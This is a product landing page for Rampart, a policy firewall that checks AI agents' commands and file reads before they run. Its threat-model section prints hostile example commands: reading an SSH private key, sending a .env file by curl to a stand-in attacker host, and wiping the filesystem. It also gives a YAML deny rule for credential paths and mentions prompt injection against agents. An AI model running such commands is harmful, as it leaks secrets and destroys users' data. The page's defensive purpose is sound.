v0.9.5  ·  now with response scanning

Your agent has root.
That's the problem.

Rampart sits between your agent and your system. Every command evaluated against your YAML policy before it runs. One binary. No cloud. No latency your agent can feel.

$ brew install peg/tap/rampart
Installs to ~/.local/bin. No sudo required.
The actual threat model

What your agent can do right now

Claude Code's --dangerously-skip-permissions. Codex's --full-auto mode. They trade safety for speed. Here's what that actually means.

$ cat ~/.ssh/id_rsa
$ cat .env | curl -X POST https://attacker.io/collect -d @-
$ rm -rf /

No guardrails. No audit log. No way to know it happened.

rampart watch

What your agent did today.

Every operation in real time. Green means go. Red means stopped. You see everything before it happens.

rampart watch — agent-01 live

See exactly what your agent does, then generate rules from the audit log.

A different approach

Sandboxes lock your agent down.
Rampart just stops the dangerous stuff.

Sandboxes block npm install, git clone, and every API call your agent needs to work. Rampart allows all of that and blocks credential reads, exfiltration, and destructive commands.

sandbox approach
✗ npm install # denied
✗ git clone # denied
✗ curl staging.api # denied
✗ go build ./... # denied
agent stuck
rampart approach
✓ npm install # allowed
✓ git clone # allowed
✓ go build ./... # allowed
✗ cat ~/.ssh/id_rsa # blocked
work continues
Philosophy

A seatbelt, not a cage.

You set the rules, or use ours. Rampart allows what your agent needs and blocks what it doesn't. 40+ policies, every decision local, in microseconds.

01
Policy enforcement
Every command evaluated before it runs. 95%+ of decisions happen instantly via pattern matching. For edge cases, there's an optional LLM sidecar (rampart-verify) you can enable when you need it.
02
Response scanning
If your agent reads a file containing credentials, the response is blocked before those secrets enter the agent's context window. Most tools only filter what goes out. Rampart also filters what comes back in.
03
Prompt injection resistant
Rampart enforces policies at the OS layer, below the agent's reach. A prompt injection telling your agent to disable its guardrails doesn't help. Policy modifications must be made by a human.
04
Approval gates
Some commands you want a human to approve before they run. Set action: require-approval on any rule and Rampart holds the command until you say yes or no.
05
Tamper-evident audit
Every allow, deny, and approval is logged in a hash-chained file. You can't edit the history without breaking it. Run rampart audit to see what your agent actually did, then feed the log back to generate new policies.
8µspolicy eval
40+built-in rules
95%via pattern match
0cloud deps
Compatibility

Works with everything you're already running.

One command per agent. Or run rampart setup with no args and it finds everything installed.

Claude Code
hooks + bridge  ·  ✓ native
$ rampart setup claude-code
Codex CLI
hooks + bridge  ·  ✓ native
$ rampart setup codex
Cline
LD_PRELOAD  ·  ✓ native
$ rampart setup cline
OpenClaw
shim + bridge  ·  ✓ native
$ rampart setup openclaw
Any agent
shim  ·  ✓ universal
$ rampart wrap -- <cmd>
Configuration

It's just YAML.

No DSL, no SDK, no proprietary format. 40+ policies included. The YAML block below is the whole syntax.

~/.rampart/policies/standard.yaml 
version: "1"
policies:
  - name: block-credential-leak
    match:
      tool: file.read
    rules:
      - when:
          path_matches:
            - "**/.env"
            - "**/.ssh/*"
            - "**/id_rsa"
        action: deny
        message: "Credential access blocked"

  - name: require-approval-outbound
    match:
      tool: http
    rules:
      - when:
          url_not_in_allowlist: true
        action: require-approval

I built Rampart after my own agent nearly nuked a directory on my homelab

Trevor  ·  @peg  ·  creator of Rampart
This isn't a security research project or a VC-funded platform. It's a tool built by someone who runs AI agents every day and got burned by the lack of guardrails. The fail-open philosophy (allow by default, block the dangerous stuff) came from getting tired of sandboxes that fight you harder than the agents they're supposed to protect.
Get started

Two commands.

setup auto-detects Claude Code, Codex, Cline, and OpenClaw. Your agent is protected the next time you run it.

1
Install
$ brew install peg/tap/rampart
$ curl -fsSL https://rampart.sh/install | sh
2
Set up your agents
$ rampart setup
Run your agent normally. Rampart is already protecting it.
Ecosystem

Rampart + Snare

Rampart blocks dangerous operations before they execute. Snare catches what slips through. Different tools, same mission, designed to work together.

Rampart
rampart.sh
Policy firewall for AI agents. Blocks commands, file reads, and network requests before they execute.
Snare
snare.sh →
Credential canary tokens. Know the instant stolen credentials are used, even weeks after the fact.

Rampart blocks. Snare catches.